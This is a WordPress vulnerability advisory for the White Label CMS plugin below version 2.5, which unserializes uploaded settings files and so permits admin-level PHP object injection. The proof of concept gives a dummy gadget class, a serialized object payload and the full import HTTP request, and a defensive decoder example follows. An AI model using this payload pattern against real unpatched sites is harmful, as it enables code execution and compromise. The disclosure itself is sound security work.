wpvulndb | Thinhnguyen1337 | WPVDB-ID:B7707A15-0987-4051-A8AC-7BE2424BCB01
Dec 08, 2022 - 12:00 a.m.

White Label CMS < 2.5 - Admin+ PHP Object Injection

2022-12-08 00:00:00
thinhnguyen1337
wpscan.com
white label cms
unserialization
php object injection
admin+
settings
user input
high-privilege users
gadget chain
import
plugin

EPSS: 0.001 (Low), percentile 36.8%

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

PoC

To simulate a gadget chain, put the following code in a plugin:

```php
class Evil {
    // Runs automatically when an Evil object is unserialized.
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}
```

Then create a file named “import.txt” with the following content:

```
O:4:"Evil":0:{};
```

Import the file via the “Import Settings” feature in Settings > White Label CMS (requires the White Label CMS plugin to be active). Then view the response to the import request, which will contain the “Arbitrary deserialization” message:

```
POST /wp-admin/options-general.php?page=wlcms-plugin.php&view=settings HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/options-general.php?page=wlcms-plugin.php
Content-Type: multipart/form-data; boundary=---------------------------3253008022193750493240374932
Content-Length: 669
Origin: http://localhost:8888
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings_nonce"

d8d0333b92
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/options-general.php?page=wlcms-plugin.php
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings"

Save
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="import_file"; filename="import.txt"
Content-Type: text/plain

O:4:"Evil":0:{};
-----------------------------3253008022193750493240374932--
```
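A defensive counterpart to the PoC, as an added example that is not the plugin's code and makes no claim about how version 2.5 fixed the issue: an import decoder that refuses any serialized object, whether at the top level or nested inside the settings array. The function names and sample setting keys are hypothetical.

```php
<?php
// Added example (hypothetical helper names; not the plugin's code).

// Stand-in gadget, as in the PoC: it must never run during import.
class Evil
{
    public function __wakeup(): void
    {
        throw new RuntimeException('gadget executed');
    }
}

// True if $value is, or contains, any object. The instanceof test covers
// PHP < 7.2, where is_object() returned false for __PHP_Incomplete_Class.
function example_contains_object($value): bool
{
    if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (example_contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Decode an uploaded settings export without instantiating any class.
// Returns the settings array, or null when the payload is refused.
function example_decode_import(string $raw): ?array
{
    // allowed_classes => false maps every serialized object to
    // __PHP_Incomplete_Class, so no __wakeup()/__destruct() is invoked.
    $data = @unserialize(trim($raw), ['allowed_classes' => false]);
    return (is_array($data) && !example_contains_object($data)) ? $data : null;
}

// Constructed sample inputs; the setting keys are invented for illustration.
$samples = [
    'settings' => serialize(['login_logo' => 'logo.png', 'hidden' => ['tools.php']]),
    'poc'      => 'O:4:"Evil":0:{};',
    'nested'   => 'a:1:{s:1:"x";O:4:"Evil":0:{}}',
];
foreach ($samples as $name => $raw) {
    $ok = example_decode_import($raw) !== null;
    printf("%-8s %s\n", $name, $ok ? 'accepted' : 'rejected');
}
```

Exporting and importing settings as JSON (`json_encode()` / `json_decode()`) avoids `unserialize()` on uploaded data altogether.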

| CPE | Name | Operator | Version |
|-----|------|----------|---------|
|     | white-label-cms | lt | 2.5 |
